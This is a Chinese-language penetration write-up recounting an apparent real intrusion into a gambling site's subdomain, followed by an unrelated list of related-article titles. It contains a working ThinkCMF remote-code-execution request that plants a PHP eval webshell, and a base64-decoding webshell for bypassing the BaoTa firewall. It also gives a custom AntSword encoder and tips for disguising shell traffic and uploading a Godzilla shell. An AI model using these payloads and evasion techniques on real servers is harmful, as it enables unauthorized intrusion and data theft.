0x00 信息收集

由于主站存在云waf 一测就封 且初步测试不存在能用得上的洞 所以转战分站 希望能通过分站获得有价值的信息

这是一个查询代理帐号的站 url输入admin 自动跳转至后台

看这个参数,猜测可能是thinkCMF

0x01 getshell

thinkcmf正好有一个RCE 可以尝试一下

?a=fetch&templateFile=public/index&prefix=''
&content=<php>file_put_contents('test1.php','<?php @eval($_POST[zero])?>')</php>

白屏是个好兆头 应该是成功了
访问一下

尝试蚁剑连接 直接报错 猜测可能遇到防火墙了

然后再回来看一下shell 手动尝试一个phpinfo

果然存在宝塔防火墙

0x02 绕过宝塔防火墙

宝塔应该对部分函数进行了过滤,所以直接传递payload肯定是不行的,所以我们需要对流量进行混淆加密。

尝试对所有的payload Base64编码传输。

既然传过去的是编码后的Base64,小马也应该相应地做出改变,只需解密一次传递过来的base64即可。

小马如下:

<?php @eval(base64_decode($_POST[zero]));?>

将phpinfo();base64编码为cGhwaW5mbygpOw==

发送

可见 宝塔防火墙没再拦截 已经成功绕过宝塔防火墙

0x03 改造蚁剑

我们用到的是Base64编码,但是蚁剑其实是自带Base64编码解码器的 。

尝试直接使用自带的Base64编码器

为什么会这样呢?

我们尝试从蚁剑的流量分析

设置代理到burp

拦截流量

我们可以看到 明显有两个地方容易被waf识别

一是: User-Agent头的关键字: antSword/v2.1 这相当于告诉waf我是谁了,所以这是第一个要更改的点;

二是: 蚁剑的流量其实还是有关键字的,比如cmd参数后的eval base64_decode都是,而且我们的小马自带Base64解密,所以用它的默认编辑器不仅过不去waf,即使没waf也不能正常连接我们的小马,所以需要自己定义编码器。

新建PHP编码器

由于我们只需要将payloadBase64编码一次即可,所以直接将data['_']Base64处理赋值即可,随机参数有没有无所谓的。

编码器如下:

'user strict';
/** @param {String} pwd  连接密码* @param {Array} data 编码器处理前的payload数组* @return {Array} data 编码器处理后的payload数组
*/
module.exports = (pwd, data, ext={}) => {data[pwd] = Buffer.from(data['_']).toString('base64');delete data['_'];return data;
}

然后修改UA头:

应用我们的编码器,解码器不需要指定,默认即可

建议选择,再增加垃圾数据和Multipart发包。

再次测试连接

然后点击目录,发现依然存在问题,不能跨目录,这个问题其实哥斯拉可以解决,上传哥斯拉马。

这里可能有人会问了,那你直接上传哥斯拉马不就行了吗,实际情况是 get传参有长度限制 而且有的符号会导致截断php文件无法上传完整。

网站有挺多 但是很可惜没有主站 数据库里只有一堆代理帐号 浪费时间了

实战|记一次绕过宝塔防火墙的BC站渗透相关推荐

  1. 实战: unicorn生成免杀木马,绕过win10防火墙和windows defender

    实战: unicorn生成免杀木马,绕过win10防火墙和windows defender 简介 原理 步骤 攻击 总结 简介 随着操作系统的安全等级越来越高,对能免杀,无视防火墙的木马需求也越来越高 ...

  2. Nmap抓包分析与绕过Windows防火墙

    前言 在打靶场的过程中使用Nmap时发现点小问题,借此机会详细分析下情况,于是有了这篇文章. 本文包含以下内容: Nmap抓包分析 内网下绕过Windows防火墙扫描存活主机 这里主要是针对Nmap进 ...

  3. 如何将风险应用加入白名单_将微信服务器、API接口的IP列表加入宝塔防火墙IP白名单...

    WordPress 一直是一个最棒的 CMS 内容管理系统,也能够非常轻松的跟微信公众号等进行对接,那么为了防止防火墙将微信功能误拦,我们需要将微信服务器.API 接口 的 IP 列表加入白名单.由于 ...

  4. 技术系列课|音视频测试实战——记音视频测试那些事

    2020年持续火热的直播带货.在线教学.视频会议产品,让越来越多的人开始钻研并专注在音视频技术领域.音视频质量是如何一步步提升的?QA人员日常是如何做评测的?本次分享中,网易智慧企业部资深音视频测试工 ...

  5. 防火墙添加ip白名单_宝塔防火墙IP白名单添加/导入云盾YUNDUN高防CDN节点IP段

    由于宝塔Nginx/Apache防火墙的规则也是非常强的,如果不将云盾(YUNDUN)高防CDN节点IP段列入宝塔防火墙白名单的话,访客容易出现502等错误. 推荐使用宝塔Linux控制面板 你还没开 ...

  6. 绕过WAF(防火墙)进入网站后台

    我们先来看下题目 题目是绕过waf(防火墙)进入后台 我们先打开靶场看下 我们先查下字段数,先猜字段数是10来看下 这里我们用order by来查字段数 order by [字段数] 访问成功了,看来 ...

  7. 实战绕过宝塔PHP disable_function 限制getshell

    一.这次做的目标站点是一个某XX站点,通过前期的信息收集,可以发现该站点是由宝塔(一般根服务器开放端口888.8888和报错界面判定)+ShuipfCMS框架搭建的 端口信息 后台 二.默认的Shui ...

  8. 记一次绕过火绒安全提权实战案例

    0x01 前言 朋友发来一个站让帮看下提权,服务器上安装的有护卫神+火绒+安全狗等安全防护软件,看着确实挺唬人,他也试了不少常用提权EXP,结果都失败了,可能是欠缺免杀EXP能力吧,当然也有可能是修复 ...

  9. jsp项目放入宝塔windows环境_商业裂变,之项目技术实战(第八节:宝塔面板介绍)...

    一.宝塔简介: 宝塔面板是一款服务器管理软件,支持windows和linux系统,可以通过Web端轻松管理服务器,提升运维效率.例如:创建管理网站.FTP.数据库,拥有可视化文件管理器,可视化软件管理 ...

最新文章

  1. Hystrix框架设计与实现
  2. [shell问答录]:命令、进程、子shell...
  3. SAP在阿里云白皮书-第三章 SAP上阿里云场景介绍
  4. Paip.断点调试MYSQL存储过程跟函数的解决方案大法
  5. 破解版PDF编辑器————Adobe Acrobat DC
  6. java maven 混淆_maven混淆Java代码
  7. Excel加载宏.xla文件的使用方法
  8. 【C代码】结构体数组初始化的相关总结
  9. 7 EXCEL常用快捷键
  10. Kotlin技术 - 委托和代理
  11. ICLR 2022最佳论文解读
  12. 2022.11.2 英语背诵
  13. linux apk 拆分 odex,android apk反编译和odex转dex-Go语言中文社区
  14. 2,JESD204为什么值得关注?
  15. 为什么那么多人喜欢用CTA策略?
  16. 浅谈共享软件如何不被暴力蹂躏
  17. select事件监听及选中
  18. 【UE4 C++】如何关联GitHub 下载UE4引擎源代码
  19. 计算机及数控编程仿真软件exsl-win7,数控铣编程与仿真实验指导书新.doc
  20. 5.3 三指针尺取法——【锻造兵器】

热门文章

  1. 容器学习 之 容器命令(八)
  2. 解决Linux因非正常关机或死机重启后进入 initramfs 问题
  3. 蓝桥杯 ALGO-21 算法训练 装箱问题
  4. 1分钟深入了解CSS3的动画属性animation
  5. 阿里巴巴java规范检查_阿里巴巴Java开发规范
  6. dataguard如何实现切换_深度干货 | 如何借助云原生搞定Oracle备份快速恢复?
  7. stm32 led屏控制卡_室内LED显示屏如何安装?
  8. 将项目依赖也打到jar包中
  9. oracle with 查询,oracle with 语句实现递归查询
  10. java接收c语言的结构体